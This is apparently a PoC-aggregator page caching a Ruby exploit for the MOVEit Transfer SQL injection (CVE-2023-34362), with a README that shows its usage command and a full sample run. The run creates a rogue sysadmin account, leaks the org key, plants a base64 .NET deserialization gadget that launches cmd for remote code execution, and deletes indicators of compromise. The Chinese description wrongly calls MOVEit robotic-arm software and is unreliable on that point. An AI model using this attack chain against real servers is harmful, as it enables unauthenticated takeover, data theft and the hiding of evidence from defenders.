Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-34362 PoC — MoveIT SQL注入漏洞

Source
https://github.com/glen-pearson/MoveIT-CVE-2023-34362-RCE
Associated Vulnerability
Title:MoveIT SQL注入漏洞 (CVE-2023-34362)
Description:MoveIT是MoveIT公司的一款针对机械臂移动操作的最先进的软件。 MoveIT 存在安全漏洞,该漏洞源于存在SQL注入漏洞。攻击者可利用该漏洞访问数据库并执行更改或删除操作。受影响的产品和版本: Progress MOVEit Transfer 2021.0.6 (13.0.6)之前版本,2021.1.4 (13.1.4)版本, 2022.0.4 (14.0.4)版本, 2022.1.5 (14.1.5)版本, 2023.0.1 (15.0.1)版本。
Description
Modified RCE with a remote shell and logging
Readme
# CVE-2023-34362: MOVEit Transfer Unauthenticated RCE

For a full technical description of the vulnerability and exploitation, please read our [AttackerKB Analysis](https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis).

## Usage

ruby move.rb <TARGET_IP>

>ruby move.rb 192.168.86.111
[+] Starting. target='https://192.168.86.111'.

[+] Retrieved initial session token '3el524tvmjs4iceurhm1r2cq' and InstID '8937'.

[+] Creating new sysadmin account: username='WZHTXMOU', userlogin='NMMLJIIP', password='LUOZFAIB'.

[+] Got API access token='3k2Bs4DBE-5YhK4kBr9HoALoGm4UIsOEg-KYMC6kcB3hwtncbiW-FCrvyXu9JuLgaXBzBg9SeX-GaykQHXWE1R4FBK9G-koUKmGB4u34LNzio3mzMDPA3deCNjGVHOkeIPbHdkcH7BouMlUtFcI0PwRt2frY0z6jBxlpXwVr4GqprxTT8lBnqTRsTpq75Mw0g5WudKvqsIa7z7HH0kq7okp7OVH8M5ABWXiFQ0l2vS9ZlXMwuV9o-1LKt1_nFJjLMtUHGn6mNzMinge774X1gOXGws2Qpjl32PlmRShx2GX0yGb8NYsin_JpJeTI-6BFzS6tJbq_UFtKaoND9WH4oZS5sLW2SHlRPNsJIfBrsi6fYKRLewKThQ'.

[+] Found folderId '963580724'.

[+] Initiated resumable file upload for fileId '966492920'...

[+] Leaked the Org Key: 0B 52 CA 0B FA 01 6F 19 5E D3 61 B1 B9 2A DA 75

[+] Using deserialization gadget: AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAugU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIG5vdGVwYWQuZXhlIiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgs=

[+] Encrypted the gadget with Org Key: @%!4QC8WSDbXNJCT0VL6JC/hk5ZHcURgjLQ0B9GNpbAX4Idws3/I9UGjGj1knj44Axu4aEWV1f5UmWeDW5qFMzifaYsXm9JDaou97xYBJ2ZwoLTuh0W4b2GsiF+cvWK6e+vT55A9P53hneQI6Vmg/wqsHbnWLSXV7vu1ehESM27VoDsxdQN6poksUNqTd8bz5iiF1CnkmixHDL7cS8pd2G0BrA6regyKiPFPqVWjvGdBW9aX3pqHxZim7zw8rgOwz1ysjhrqynUY+4fzwQak3NdUsKIVIwagLnD+tAUpYVnL//sJK8JBsnd47Syyj1euF3CYe828p7BumamHiXgMrMA68NC5zq+33tG7a/oXrK5hLft1WPu+9HpxhdNnOTel0N6/RIxcmOfV0bylH7oo8OBLZw6LIQcVgiInv+8xNZ3vPrWK/XYZibNYD2pBNwa38MjS2y9VqqIdi5/zZHo9PuLHayqpM0plqGivMjDq6RXE8gkc/rJ6VNqB2djRCLn8FyOSqR3Btqz/1VnWPDVuooYLnNAfUw7pOnAyu+PABKCExsFbt70YmhIe0loY2clQ6X7LBQtvcEipccKHhwRCxK71yC3gWi7h2OfCh/5VqfOi/cKJ/vs8mEbi1IimeXvAdTXXS3yfzyOURS3nOrHsutF0dhfIfpw0gDVSkdgMVFVRIgxAW160ptBvram/qWIrboe6HawtftSp3Dm7MjaQgT+g/XmVIAAbFYb0jyOOYj/oneOGmSimm4Oupyv2+xiTDf2pHGF1DgF06zT87wmWWvv7TJ3ENNe4sqGmZ6jQB6loZf+/+BEzhYUZgELCHL0UyAu3o6H3a6DtYZ/kkmH+LpYzd9WaplYUyfKQmqChdSO+zqe83uw6rPRql+C+wJOKcGVNAvUMaxCqn3n4rQf73Dg8PicPZHRa/hAD6QOUo7RXbuBPI721NcnhWNg4j/zlW4t7Zosq0j1QQdqP4DleIpeeO/mvXLd1EeqfM8dMI8FxNk2scRGX6Q6WbjVkLfXFRCx7BDpkIR4pB+0Qbtd1Y8BFUxrjKbRfN0rovIz++yBN2STILcLWr8twT21uMwDPuqzPBCY/a1hsl1hE0T2mbtP2ghGcLu2TzaV/XebpH6mndAHJVKey5FcDvZnInp/l2xCdofxxgsYK9i0KqzOS7liQdYz5qyau8dnSHxFiAWRJRI4IkkW6QNtmsTSTlth88aK4nKBXc5DUqUL71N4j6RMVRwZqUJKJy55h3gc84We96H16v6/GYV5QSPm3/DqDA0KKKkqej1Mh0FWfpxjjKwPy+oeEErIHBeUQMIgjdm06XPuzfejT66UvZsgX4YO3BiGcNUYD3WdeIFwEKnpHU/Xw/9j3oPcTyGWWeal2vvQDJ2j9xa4OLFa3waJjb6Zd56l07CUNhN0CiGBTfPagyj/c+NKPiSUWNJDN5bea3duiK670cMQTdMLWDeBUN4qUXPtBKr4wyrcNNhbxIqASx1MCWqIOxQ8MSIedvgrO4w84cl2ntXCSMIyGXREgJ/iWgCIlBjCke3PLY7EKXqihmV8ESLrY78iTniC1/gVL6rQDu+haUuIZxogRs/8PKjo8cI4VMTXE0EaNFCAjc9K2d6hc6ZnBMv9vKF9TwKcm/w92O7TBAjqp3kjQ3JezWk=

[+] Planting encrypted gadget into the DB...

[+] Triggering gadget deserialization...

[+] Gadget deserialized, RCE Achieved!

[+] Deleating IoC's from the DB...

[+] Finished.
File Snapshot

 [4.0K]  /data/pocs/146a37f7e07b6a987ae3aadc012b2845d1c3355d
├── [2.3K]  moveit_transfer_cve-2023-34362.nse
├── [ 13K]  move.rb
└── [4.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.